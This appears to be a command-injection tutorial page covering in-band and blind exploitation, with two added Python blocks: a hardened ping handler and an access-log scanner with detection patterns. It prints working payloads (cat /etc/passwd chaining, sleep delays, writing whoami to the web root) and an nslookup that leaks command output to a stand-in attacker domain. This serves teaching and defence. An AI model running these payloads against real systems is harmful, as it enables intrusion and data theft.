Mastering Command Injection Part 3
How To Exploit Command Injection?
Exploiting In-Band Command Injection
Shell metacharacters: &, &&, |, ||, ;, \n, `, $()
Concatenate another command:
127.0.0.1 && cat /etc/passwd &
or 127.0.0.1 & cat /etc/passwd &
or 127.0.0.1 || cat /etc/passwd &
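As an added illustration (not code from the original page), here is the server-side pattern that makes the payloads above work, placed beside its hardened counterpart in Python. The endpoint, function names and the choice of `ping -c 1` are assumptions made for this example: `vulnerable_ping_command` builds a shell string from user input, while `safe_ping_argv` accepts only a syntactically valid IP address and passes it as a separate argv element so no shell ever parses it. `is_injection_attempt` flags the metacharacters listed above for logging or input screening.

```python
import ipaddress
import re
import subprocess
from typing import List

# The shell metacharacters listed above. If a value containing any of them is
# handed to a shell, the shell parses it as a command separator or substitution.
SHELL_METACHARS = re.compile(r"[&|;`$\n]")


def is_injection_attempt(value: str) -> bool:
    """True if the value carries a shell metacharacter; useful as a log or WAF check."""
    return bool(SHELL_METACHARS.search(value))


def vulnerable_ping_command(host: str) -> str:
    """The unsafe pattern (hypothetical endpoint): user input concatenated into a
    command line that a shell will parse. The string is returned rather than
    executed so the example stays inert. With host = '127.0.0.1 && cat /etc/passwd &'
    the shell would run ping and then cat."""
    return "ping -c 1 " + host


def safe_ping_argv(host: str) -> List[str]:
    """Hardened form: accept only a syntactically valid IP address, and build an
    argv list so no shell is involved and metacharacters have no meaning."""
    ip = ipaddress.ip_address(host.strip())  # ValueError for anything that is not an IP
    return ["ping", "-c", "1", str(ip)]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute the hardened command; a list argv means shell=False, the default."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    payload = "127.0.0.1 && cat /etc/passwd &"
    print("shell would see:", vulnerable_ping_command(payload))
    print("flagged:", is_injection_attempt(payload))
    try:
        safe_ping_argv(payload)
    except ValueError as e:
        print("rejected:", e)
```

The validation step matters as much as avoiding the shell: even with an argv list, an unvalidated value such as `-f` could still be interpreted as an option by `ping` itself, so the allowlist (a parseable IP address) is what keeps the argument inert.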
Exploiting Blind Command Injection
Shell metacharacters: &, &&, |, ||, ;, \n, `, $()
Trigger a time delay:
127.0.0.1 && sleep 10 &
or 127.0.0.1 && ping -c 10 127.0.0.1 &
The sleep command only exists on Unix systems, whereas ping is available on both Unix and Windows.
Both commands achieve the same thing: a time delay of 10 seconds before the response arrives.
This only proves that a blind command injection exists; it does not yet demonstrate any impact from it.
To prove impact: write the command's output into the web root and retrieve the file directly with a browser.
127.0.0.1 & whoami > /var/www/static/whoami.txt &
This runs the "whoami" command and redirects its output into "/var/www/static" (a directory served to anyone using the application), saving it as a file called "whoami.txt".
If you browse to that directory and see a file called "whoami.txt", the command injection was successful, and the contents of the .txt file will be the output of the "whoami" command.
Another way to prove that the command injection both exists and is exploitable is to demonstrate impact by opening an out-of-band channel back to a server you control.
127.0.0.1 & nslookup kgi2ohoyw.web-attacker.com &
To prove it is vulnerable to blind command injection: run the "nslookup" command against a domain you control, "kgi2ohoyw.web-attacker.com".
Since you control that server, you monitor its logs to see whether the vulnerable application performed a lookup against your attacker-controlled server.
If it did, the application is vulnerable to command injection. If it did not, it is not.
To prove impact with this method, you need to run a command within a command.
127.0.0.1 & nslookup `whoami`.kgi2ohoyw.web-attacker.com &
or 127.0.0.1 & nslookup $(whoami).kgi2ohoyw.web-attacker.com &
This runs the "whoami" command, prepends its output as a subdomain of your attacker-controlled domain, and then performs an "nslookup" of that subdomain, so the command's output shows up in your DNS logs.
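From the defender's side, the time-delay and out-of-band payloads described in this section, and the in-band ones earlier, leave a recognisable trace in the web server's access log. The following added example (not from the original page) parses constructed combined-format log lines, URL-decodes each query parameter, and classifies suspicious values as in-band, time-based, or out-of-band. The log lines, client addresses and the /ping endpoint are constructed for this example; the payloads and the attacker domain mirror the ones shown above. The delay pattern also accepts ping -n, the Windows spelling of the count flag.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined format, not real traffic).
# Query strings are percent-encoded as a browser or proxy would send them;
# the payloads and the attacker domain mirror the ones shown in the text.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /ping?host=127.0.0.1%20%26%26%20cat%20/etc/passwd%20%26 HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /ping?host=127.0.0.1%20%26%26%20sleep%2010%20%26 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /ping?host=127.0.0.1%20%26%20nslookup%20kgi2ohoyw.web-attacker.com%20%26 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=fish%20%26%20chips HTTP/1.1" 200 900
"""

# Minimal parser for the fields we need from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# The shell metacharacters listed on the page. A metacharacter is necessary
# but not sufficient: "fish & chips" is a legitimate search string.
META = re.compile(r"[&|;`$\n]")
# Commands commonly chained after a metacharacter (small allowlist, extend as needed).
COMMAND_WORDS = r"(cat|whoami|id|uname|sleep|ping|nslookup|dig|curl|wget)"
CHAIN = re.compile(r"(&&|\|\||[&|;`\n]|\$\()\s*" + COMMAND_WORDS + r"\b")
# Time-delay primitives: sleep N, or ping with a count (-c on Unix, -n on Windows).
TIME_DELAY = re.compile(r"\b(sleep\s+\d+|ping\s+-[cn]\s+\d+)\b")
# Out-of-band primitives: a DNS lookup or HTTP fetch towards some hostname.
OOB = re.compile(r"\b(nslookup|dig|curl|wget)\s+\S+")


def classify(value: str) -> Optional[str]:
    """Return 'in-band', 'time-based', 'out-of-band', or None for a benign value."""
    if not META.search(value):
        return None
    if TIME_DELAY.search(value):
        return "time-based"
    if OOB.search(value):
        return "out-of-band"
    if CHAIN.search(value):
        return "in-band"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Decode every query parameter of every request and report suspicious ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        query = urlsplit(m["target"]).query
        # parse_qsl splits on the raw '&' first, then percent-decodes each value,
        # so an encoded %26 inside a payload survives as part of that value.
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                findings.append({"ip": m["ip"], "time": m["ts"], "param": name,
                                 "value": value, "kind": kind})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:12} {f['param']}={f['value']!r}")
```

Running the script prints the three suspicious requests from 10.0.0.7 and nothing for the two benign ones. In a real deployment, the out-of-band classification is best confirmed by correlating with DNS resolver logs from the web server, which is the same evidence the attacker relies on from the other end.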
Automated Exploitation Tools
Web Application Vulnerability Scanners (WAVS): any decent scanner should be able to scan for command injection, for example:
Burp scanner
Arachni
OWASP Zap
Wapiti
Acunetix
W3af